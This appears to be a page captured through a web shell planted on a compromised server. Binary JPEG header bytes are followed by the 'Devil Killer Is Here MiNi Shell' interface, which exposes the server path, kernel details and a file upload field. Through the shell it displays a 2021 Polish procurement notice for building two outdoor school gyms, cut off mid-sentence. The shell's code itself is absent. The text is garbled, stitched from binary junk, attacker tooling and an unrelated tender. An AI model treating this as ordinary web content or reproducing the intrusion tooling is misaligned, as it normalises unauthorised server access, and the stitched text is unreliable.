JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210908/0017477502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa siłowni </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Miński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711581788</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">T. Kościuszki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mińsk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatminski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatminski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa siłowni </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b15f1819-109a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00174775</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000368/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa siłowni plenerowej przy Zespole Szkół Zawodowych Nr 2 im. Powstańców Warszawy w Mińsku Mazowieckim</p> <p class="mb-0">1.1.5 Budowa siłowni zewnętrznej przy Zespole Szkół Specjalnych w Ignacowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> ZADANIE I: z budżetu Województwa Mazowieckiego w ramach „Mazowieckiego Instrumentu Wsparcia Infrastruktury Sportowej MAZOWSZE 2021”, ZADANIE II: z Europejskiego Funduszu Rozwoju Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach PROW 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatminski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiatminski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">PONIŻSZA NUMERACJA ZGODNA Z SWZ.<br/>7. Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie się komunikował z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>7.1. Postępowanie prowadzone jest w języku polskim, za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiatminski<br/>7.2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>7.3. Zamawiający dopuszcza opcjonalnie komunikację za pomocą poczty elektronicznej na adres: zamowienia@powiatminski.pl (nie dotyczy składania ofert).<br/>7.4. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>7.5. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>7.6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7.7. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>7.8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem (https://platformazakupowa.pl/strona/1-regulamin) w zakładce „Regulamin" oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem (https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">PONIŻSZA NUMERACJA ZGODNA Z SWZ.<br/>25.8. Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o Ochronie Danych (RODO) informujemy, że:<br/>1) administratorem Państwa danych osobowych jest Starostwo Powiatowe w Mińsku Mazowieckim z siedzibą w Mińsku Mazowieckim przy ul. T. Kościuszki 3,<br/>2) administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować w sprawach przetwarzania Państwa danych osobowych za pośrednictwem poczty elektronicznej: iod@powiatminski.pl;<br/>3) administrator będzie przetwarzał Państwa dane osobowe na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzonym postępowaniem o udzielenie zamówienia publicznego;<br/>4) dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów prawa, a także podmiotom, z którymi administrator zawarł umowę w związku z realizacją usług na rzecz administratora (np. kancelarią prawną, dostawcą oprogramowania, zewnętrznym audytorem, zleceniobiorcą świadczącym usługę z zakresu ochrony danych osobowych). Odbiorcami danych będą także osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5) administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub organizacji międzynarodowej;<br/>6) mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1) Państwa dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>2) przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego;<br/>3) podanie danych osobowych jest dobrowolne, jednakże niezbędne do realizacji ww. celu. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>4) administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">I.272.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PONIŻSZA NUMERACJA ZGODNA Z SWZ.<br/>4.1. Przedmiotem zamówienia są roboty budowlane w zakresie Budowy siłowni plenerowej przy Zespole Szkół Zawodowych Nr 2 im. Powstańców Warszawy w Mińsku Mazowieckim, obejmującej zakup, transport, montaż urządzeń siłowni zewnętrznej/plenerowej oraz elementów małej architektury wraz z zagospodarowaniem terenu.<br/>Przedmiot zamówienia jest współfinansowany ze środków z budżetu Województwa Mazowieckiego w ramach „Mazowieckiego Instrumentu Wsparcia Infrastruktury Sportowej MAZOWSZE 2021”.<br/><br/>4.2.	Wykonawca w ramach realizacji przedmiotu zamówienia wykona:<br/>a) roboty przygotowawcze, <br/>b) siłownię zewnętrzną zawierającą:<br/>	urządzenie do ćwiczeń typu Wyciskanie leżąc + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Narciarz + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Wioślarz + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Wyciskanie siedząc + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Wyciąg górny + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Biegacz + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Podnosiciel rąk + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Motyl + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Motyl rewers + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Orbitrek + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Jeździec + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Prasa nożna + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Podnosiciel nóg + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Prostownik pleców + pylon - 1 szt.<br/>	urządzenie do ćwiczeń typu Odwodziciel + słup + Wahadło - 1 szt.<br/>c) elementy małej architektury:<br/>	ławka - 4 szt.<br/>	kosz na śmieci - 1 szt.<br/>	stojak na rowery - 1 szt.<br/>	regulamin - 1 szt.<br/>4.3.	Wymagania dotyczące urządzeń<br/>1)	Urządzenia powinny być fabrycznie nowe.<br/>2)	Urządzenia katalogowane powinny posiadać aktualne atesty i certyfikaty bezpieczeństwa wydane przez akredytowaną jednostkę certyfikującą, potwierdzające zgodność z integrowanymi polskimi i europejskimi aktualnymi wersjami normy PN-EN16630:2015-06.<br/>3)	przedmiot zamówienia zostanie objęty co najmniej 5-letnim okresem gwarancji i rękojmi jednak nie dłuższym niż 7 – lat licząc od dnia przekazania przedmiotu zamówienia Zamawiającemu. Dokument gwarancyjny stanowi Załącznik Nr 2 do umowy.<br/>4)	Urządzenia powinny: <br/>a)	zawierać instrukcję obsługi słowną i obrazkową umieszczoną na pylonie.<br/>b)	posiadać umieszczony przez producenta czytelny znak poziomu podstawowego, wskazującego wysokość, na jakiej montaż w gruncie gwarantuje stabilność sprzętu (znak ten powinien być równy z nawierzchnią lub płaszczyzną placu). <br/>c)	być oznaczone tabliczką znamionową zawierającą informację o numerze katalogowym pozwalającym na ich identyfikację w karcie technicznej urządzenia i certyfikacie, nazwie i adresie producenta lub upoważnionego przedstawiciela, dacie produkcji, numerze seryjnym, numerze i dacie normy, zgodnie z którą urządzenie wyprodukowano.<br/>d)	być wykonane z bezpiecznych i trwałych materiałów i być zgodny z normami z grupy PN EN 1176-2009 i PN-EN 1177:2009 i warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa i higieny w szkołach. <br/>e)	być rozmieszczone na wydzielonym placu w sposób umożliwiający zachowanie stref bezpieczeństwa pomiędzy urządzeniami. <br/>f)	zamontowane zgodnie z instrukcją producenta urządzenia.<br/>5)	Regulamin umieszczony na tablicy informacyjnej winien zawierać zasady i warunki korzystania z siłowni zewnętrznej, numery alarmowe, numer telefonu do Zarządcy placu, na którym zlokalizowana jest siłownia oraz adres tego placu. Ostateczna treść powinna zostać uzgodniona wcześniej z Zamawiającym. <br/>6)	Wszystkie urządzenia oraz elementy małej architektury muszą być na stałe posadowione w gruncie poprzez zabetonowanie elementów kotwiących.<br/>4.4.	Wymagania dotyczące robót<br/>1)	Roboty przygotowawcze, w tym: <br/>a)	wygrodzenie placu budowy przed dostępem osób nieupoważnionych,<br/>b)	uporządkowanie i wyrównanie terenu przed rozpoczęciem robót.<br/>2)	Roboty budowlane, w tym:<br/>a)	wyznaczenie w granicach placu budowy miejsc usytuowania urządzeń wymienionych w dokumentacji projektowej; <br/>b)	korytowanie pod fundamenty urządzeń;<br/>c)	wykonanie fundamentów w miejscach pod urządzenia wyposażenia zgodnie z instrukcją producenta w zakresie technologii połączenia z montowanymi urządzeniami.<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie robót budowlanych zawarty jest w:<br/>Załączniku nr 8A do SWZ	-	Dokumentacja techniczna dla ZADANIA I:<br/>Załączniku nr 9A do SWZ	-	Przedmiar dla ZADANIA I (pdf.)<br/>4)	Realizacja robót dotyczących przedmiotowej inwestycji w zakresie technologii jak i samej budowy musi odpowiadać przepisom prawa, w tym techniczno-budowlanym, warunkom technicznym wykonania i odbioru robót budowlanych i montażowych w zakresie wykonania „małej architektury” oraz Polskim Normom, aprobatom technicznym i/lub deklaracjom zgodności lub innym dokumentom normującym wprowadzenie wyrobów do obrotu i stosowania w budownictwie. <br/>5)	Podczas realizacji robót dotyczących przedmiotowej inwestycji wymagane jest od Wykonawcy obligatoryjne przestrzeganie Polskich Norm wskazanych w dokumentacji projektowej i stosownych do przedmiotowej inwestycji przepisów prawa, w tym: <br/>	ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz. U. z 2020r., poz. 1333 z późn. zm.) wraz z aktami wykonawczymi,<br/>	rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. Nr 109, poz. 719 z późn. zm.), <br/>	rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. z 2003r. Nr 169, poz. 1650, z późn. zm.),<br/>	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2020. poz. 1219 z późn. zm.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37530000-2 - Artykuły do zabaw na wolnym powietrzu, gier salonowych lub towarzyskich</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PONIŻSZA NUMERACJA ZGODNA Z SWZ.<br/>4.1. Przedmiotem zamówienia są roboty budowlane w zakresie Budowy siłowni zewnętrznej przy Zespole Szkół Specjalnych w Ignacowie, obejmującej zakup, transport, montaż urządzeń siłowni zewnętrznej/plenerowej oraz elementów małej architektury wraz z zagospodarowaniem terenu.<br/>Przedmiot zamówienia jest współfinansowany ze środków z Europejskiego Funduszu Rozwoju Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach PROW 2014-2020.<br/><br/>4.2.	Wykonawca w ramach realizacji przedmiotu zamówienia wykona:<br/>a) siłownię zewnętrzną zawierającą:<br/>	urządzenie do ćwiczeń typu Biegacz FIT-BG	1 szt.<br/>	urządzenie do ćwiczeń typu Drabinka + Podciąg Nóg FIT-DR+FIT-PG	1 szt.<br/>	urządzenie do ćwiczeń typu Koła Tai-Chi – Tai Chi Spinner FIT-TC	1 szt.<br/>	urządzenie do ćwiczeń typu Orbitrek + Ławka do ćwiczeń FIT-OR+FIT-LW;	1 szt.<br/>	urządzenie do ćwiczeń typu Stepper/Pajacyk FIT-ST+FIT-PJ/P	1 szt.<br/>	urządzenie do ćwiczeń typu Rowerek FIT-RW;	1 szt.<br/>	urządzenie do ćwiczeń typu Twister+Wahadło FIT-TW+FIT-WH;	1 szt.<br/>	urządzenie do ćwiczeń typu Wiślarz+Prasa nożna FIT-WL+FIT-PN;	1 szt.<br/>	urządzenie do ćwiczeń typu Wyciąg górny+Wyciskanie siedząc FIT-WG+FIT WS;	1 szt.<br/>	urządzenie do ćwiczeń typu Fitness Mini – Biegacz podwójny OFK-01;	1 szt.<br/>	urządzenie do ćwiczeń typu Fitness Mini – Koła Tai Chi OFK-03;	1 szt.<br/>	urządzenie do ćwiczeń typu Fitness Mini – Kręciołki siedząc i stojąc OFK-04;	1 szt.<br/>	urządzenie do ćwiczeń typu Fitness Mini – Rowerek - Stepper OFK-09;	1 szt.<br/>	urządzenie do ćwiczeń typu stół betonowy do gry w ping-ponga;	1 szt.<br/>b) elementy małej architektury:<br/>	montaż tablicy informacyjnej z regulaminem siłowni zewnętrznej;	1 szt.<br/>	ławki stalowe z oparciem;	2 szt.<br/>	kosz na śmieci stalowy;	1 szt.<br/>c) montaż ogrodzenia systemowego wraz z furtką.<br/><br/>4.3.	Wymagania dotyczące urządzeń<br/>1)	Urządzenia powinny być fabrycznie nowe.<br/>2)	Urządzenia katalogowane powinny posiadać aktualne atesty i certyfikaty bezpieczeństwa wydane przez akredytowaną jednostkę certyfikującą, potwierdzające zgodność z integrowanymi polskimi i europejskimi aktualnymi wersjami normy PN-EN16630:2015-06.<br/>3)	przedmiot zamówienia zostanie objęty co najmniej 5-letnim okresem 